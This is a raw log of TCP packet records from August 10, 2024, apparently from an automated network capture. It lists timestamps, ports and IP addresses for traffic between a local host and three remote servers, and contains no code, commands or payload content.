Aug 10, 2024 16:12:24.089093924 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.089111090 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.089168072 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.089183092 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.089214087 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.089235067 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.089624882 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.089643955 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.089684010 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.089696884 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.089723110 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.089740038 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.090147018 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.090162992 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.090213060 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.090225935 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.090250015 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.090267897 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.090982914 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.090998888 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.091041088 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.091053963 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.091075897 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.091098070 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.093875885 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.093894958 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.093950033 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.093964100 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.093987942 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.094012022 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.125407934 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.125421047 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.125508070 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.125508070 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.125511885 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.125586987 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.125765085 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.125788927 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.125866890 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.125866890 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.125927925 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.125982046 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.126111031 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.126125097 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.126210928 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.126210928 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.126215935 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.126254082 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.126732111 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.126744986 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.126827002 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.126831055 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.126904964 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.127125978 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.127139091 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.127309084 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.127314091 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.127433062 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.127641916 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.127655029 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.127705097 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.127708912 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.127726078 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.127737999 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.128170013 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.128205061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.128240108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.128290892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.128324032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.128355026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.128366947 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.128366947 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.128366947 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.128387928 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.128421068 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.128432989 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.128621101 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.128633976 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.128696918 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.128696918 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.128703117 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.128717899 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.128767967 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.129053116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129102945 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129136086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129168034 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129199982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129209995 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.129209995 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.129231930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129264116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129292965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129317999 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.129434109 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.129446030 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.129511118 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.129514933 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.129520893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129568100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.129568100 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.129568100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129580021 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.129604101 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129636049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129668951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129710913 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.129772902 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129805088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129837036 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.129838943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129858017 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.129869938 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129904032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129908085 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.129935980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129967928 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.129998922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130007982 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130007982 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130007982 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130032063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130078077 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130080938 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130112886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130145073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130196095 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130207062 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130207062 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130227089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130259991 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130290985 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130300045 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130300045 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130321980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130361080 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130361080 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130438089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130486965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130520105 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130551100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130559921 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130559921 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130559921 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130701065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130753040 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130785942 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130805016 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130817890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130836964 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130846024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130878925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130897045 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130912066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130919933 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.130944014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.130975962 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131007910 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131040096 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131072044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131097078 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131097078 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131097078 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131103992 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131134033 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131161928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131166935 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131195068 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131217957 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131226063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131258965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131289005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131297112 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131321907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131354094 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131361008 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131400108 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131402969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131431103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131463051 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131470919 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131494045 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131500959 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131526947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131536961 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131563902 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131596088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131612062 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131627083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131659031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131661892 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131661892 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131709099 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131742001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131771088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131776094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131793022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131805897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131892920 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131927013 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131937027 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.131959915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.131990910 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132011890 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132011890 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132011890 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132026911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132059097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132093906 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132124901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132157087 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132184982 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132188082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132194042 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132194042 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132194042 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132204056 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132225990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132229090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132281065 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132320881 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132329941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132360935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132394075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132402897 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132426023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132456064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132497072 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132503986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132535934 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132567883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132584095 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132600069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132607937 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132621050 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132627010 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132632017 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132664919 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132697105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132745028 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132747889 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132782936 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132783890 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132813931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132822037 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132847071 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132879019 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132913113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132924080 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132945061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132977009 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.132997036 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.132997036 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133008957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133042097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133073092 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133104086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133136034 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133145094 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133145094 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133163929 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133167028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133178949 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133198023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133229017 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133260965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133292913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133323908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133339882 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133341074 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133341074 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133354902 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133387089 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133419037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133425951 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133454084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133486986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133495092 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133518934 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133550882 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133582115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133614063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133641005 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133641005 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133646965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133655071 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133678913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133709908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133740902 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133747101 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133773088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133791924 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133805037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133853912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133886099 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133929968 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133929968 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.133936882 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.133970022 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134001017 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134032965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134040117 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.134064913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134072065 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.134100914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134133101 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134145021 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.134164095 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134193897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134202003 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.134226084 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134257078 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134274006 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.134289026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134321928 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134330034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.134354115 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134386063 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134397030 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.134418011 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134452105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134459019 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.134484053 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134515047 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134525061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.134550095 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134578943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134612083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134624958 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.134644032 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134675980 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.134704113 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.134711027 CEST	80	49739	147.45.44.104	192.168.2.4
